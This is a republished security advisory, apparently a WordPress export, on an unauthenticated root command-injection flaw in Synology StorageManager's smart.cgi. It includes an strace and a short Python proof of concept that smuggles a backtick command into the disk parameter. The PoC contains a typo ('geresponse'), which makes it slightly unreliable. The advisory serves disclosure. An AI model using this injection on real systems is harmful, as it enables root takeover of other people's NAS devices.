{"id":10625,"date":"2017-11-27T14:19:23","date_gmt":"2017-11-27T22:19:23","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/11\/27\/news-4397\/"},"modified":"2017-11-27T14:19:23","modified_gmt":"2017-11-27T22:19:23","slug":"news-4397","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/11\/27\/news-4397\/","title":{"rendered":"SSD Advisory \u2013 Synology StorageManager smart.cgi Remote Command Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 27 Nov 2017 13:45:53 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3540\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><br \/><script>var obj = jQuery('#a-href-3540');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script> See our full scope at: <a href=\"https:\/\/blogs.securiteam.com\/index.php\/product_scope\">https:\/\/blogs.securiteam.com\/index.php\/product_scope<\/a><\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a remote command execution vulnerability found in Synology StorageManager.<\/p>\n<p>Storage Manager is &#8220;a management application that helps you organize and monitor the storage capacity on your Synology NAS. Depending on the model and number of installed hard drives, Storage Manager helps you accomplish the following tasks:<\/p>\n<ul>\n<li>Create different types of RAID and non-RAID storage configurations, such as volumes, disk\/RAID groups, iSCSI LUNs, and iSCSI Targets.<\/li>\n<li>Monitor the overall storage usage of your Synology NAS.<\/li>\n<li>Inspect the health of installed hard drives and solid state drives.<\/li>\n<li>Use advanced options, such as hot spare drives, SSD TRIM, SSD cache, and more.&#8221;<\/li>\n<\/ul>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Nigusu Kassahun, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> Synology has released patches to address this vulnerability &#8211; DSM 5.2-5967-5<\/p>\n<p>For more information: https:\/\/www.synology.com\/en-global\/releaseNote\/DS210+<\/p>\n<p><span id=\"more-3540\"><\/span><\/p>\n<p><strong>Vulnerability details<\/strong><br \/> User controlled input is not sufficiently sanitized, and then passed to <em>execve<\/em> function. <\/p>\n<p>Successful exploitation of this vulnerability enables a remote unauthenticated user to run commands as root on the machine.<\/p>\n<p>The vulnerable parameter can be found in <em>\/webman\/modules\/StorageManager\/smart.cgi<\/em> with parameter <em>action=apply&#038;operation=quick&#038;disk=%2Fdev%2Fsda<\/em><\/p>\n<p><strong>Strace<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a1c8f6ac4e06970327991\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> execve(&#8220;\/usr\/syno\/bin\/smartctl&#8221;, [&#8220;\/usr\/syno\/bin\/smartctl&#8221;, &#8220;-d&#8221;, &#8220;ata&#8221;, &#8220;-  t&#8221;, &#8220;short&#8221;, &#8220;\/dev\/sda&#8221;], [&#8220;GATEWAY_INTERFACE=CGI\/1.1&#8221;,  &#8220;CONTENT_TYPE=application\/x-www-form-urlencoded; charset=UTF-8&#8221;,  &#8220;HTTP_X_REQUESTED_WITH=XMLHttpRequest&#8221;, &#8220;REMOTE_ADDR=192.168.56.1&#8221;,  &#8220;QUERY_STRING=&#8221;, &#8220;REMOTE_PORT=34708&#8221;, &#8220;DOCUMENT_ROOT=\/usr\/syno\/synoman&#8221;,  &#8220;HTTP_USER_AGENT=Mozilla\/5.0 (X11; Linux i686; rv:47.0) Gecko\/20100101  Firefox\/47.0&#8221;, &#8220;SERVER_SIGNATURE=&#8221;,  &#8220;HTTP_ACCEPT=text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8&#8221;  , &#8220;CONTENT_LENGTH=42&#8221;,  &#8220;SCRIPT_FILENAME=\/usr\/syno\/synoman\/webman\/modules\/StorageManager\/smart.cgi&#8221;,  &#8220;HTTP_HOST=192.168.56.101:5000&#8221;,  &#8220;REQUEST_URI=\/webman\/modules\/StorageManager\/smart.cgi&#8221;,  &#8220;SERVER_SOFTWARE=Apache&#8221;, &#8220;HTTP_CONNECTION=close&#8221;,  &#8220;MOD_X_SENDFILE_ENABLED=yes&#8221;,  &#8220;PATH=\/sbin:\/bin:\/usr\/sbin:\/usr\/bin:\/usr\/syno\/sbin:\/usr\/syno\/bin:\/usr\/local\/s  bin:\/usr\/local\/bin&#8221;, &#8220;HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5&#8221;,  &#8220;HTTP_REFERER=http:\/\/192.168.56.101:5000\/webman\/index.cgi&#8221;,  &#8220;SERVER_PROTOCOL=HTTP\/1.1&#8221;, &#8220;HTTP_ACCEPT_ENCODING=gzip, deflate&#8221;,  &#8220;SCRIPT_URI=http:\/\/192.168.56.101:5000\/webman\/modules\/StorageManager\/smart.cg  i&#8221;, &#8220;SCRIPT_URL=\/webman\/modules\/StorageManager\/smart.cgi&#8221;,  &#8220;REQUEST_METHOD=POST&#8221;, &#8220;SERVER_ADMIN=admin&#8221;, &#8220;SERVER_ADDR=192.168.56.101&#8221;,  &#8220;PWD=\/usr\/syno\/synoman\/webman\/modules\/StorageManager&#8221;, &#8220;SERVER_PORT=5000&#8221;,  &#8220;SCRIPT_NAME=\/webman\/modules\/StorageManager\/smart.cgi&#8221;,  &#8220;SERVER_NAME=192.168.56.101&#8221;]) = 0<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0018 seconds] -->  <\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a1c8f6ac4e0e812669807\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> # Synology StorageManager &lt;= 5.2 Remote Root Command Execution    import httplib    HOST = raw_input(&#8220;Enter Host: &#8220;)    #IDOR to bypass auth and ticks to chain commands  conn = httplib.HTTPConnection(HOST)  conn.request(&#8220;GET&#8221;,&#8221;\/webman\/modules\/StorageManager\/smart.cgi?action=apply&amp;operation=quick&amp;disk=\/dev\/sda`id%20&gt;\/tmp\/LOL`&#8221;)  res = conn.geresponse()  print res.status, res.reason<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6ac4e0e812669807-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6ac4e0e812669807-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6ac4e0e812669807-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6ac4e0e812669807-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6ac4e0e812669807-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6ac4e0e812669807-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6ac4e0e812669807-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6ac4e0e812669807-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6ac4e0e812669807-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6ac4e0e812669807-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6ac4e0e812669807-11\">11<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6ac4e0e812669807-1\"><span class=\"crayon-p\"># Synology StorageManager &lt;= 5.2 Remote Root Command Execution<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6ac4e0e812669807-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6ac4e0e812669807-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">httplib<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6ac4e0e812669807-4\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6ac4e0e812669807-5\"><span class=\"crayon-v\">HOST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">raw_input<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Enter Host: &#8220;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6ac4e0e812669807-6\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6ac4e0e812669807-7\"><span class=\"crayon-p\">#IDOR to bypass auth and ticks to chain commands<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6ac4e0e812669807-8\"><span class=\"crayon-v\">conn<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">httplib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">HTTPConnection<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">HOST<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6ac4e0e812669807-9\"><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">request<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;GET&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;\/webman\/modules\/StorageManager\/smart.cgi?action=apply&amp;operation=quick&amp;disk=\/dev\/sda`id%20&gt;\/tmp\/LOL`&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6ac4e0e812669807-10\"><span class=\"crayon-v\">res<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">conn<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">geresponse<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6ac4e0e812669807-11\"><span class=\"crayon-e\">print <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">status<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">res<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">reason<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0008 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3540\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 27 Nov 2017 13:45:53 +0000<\/strong><\/p>\n<p>\ufeffVulnerability Summary The following advisory describes a remote command execution vulnerability found in Synology StorageManager. Storage Manager is &#8220;a management application that helps you organize and monitor the storage capacity on your Synology NAS. Depending on the model and number of installed hard drives, Storage Manager helps you accomplish the following tasks: Create different types &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3540\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Synology StorageManager smart.cgi Remote Command Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11851,10757,12136],"class_list":["post-10625","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10625","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10625"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10625\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10625"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10625"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10625"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}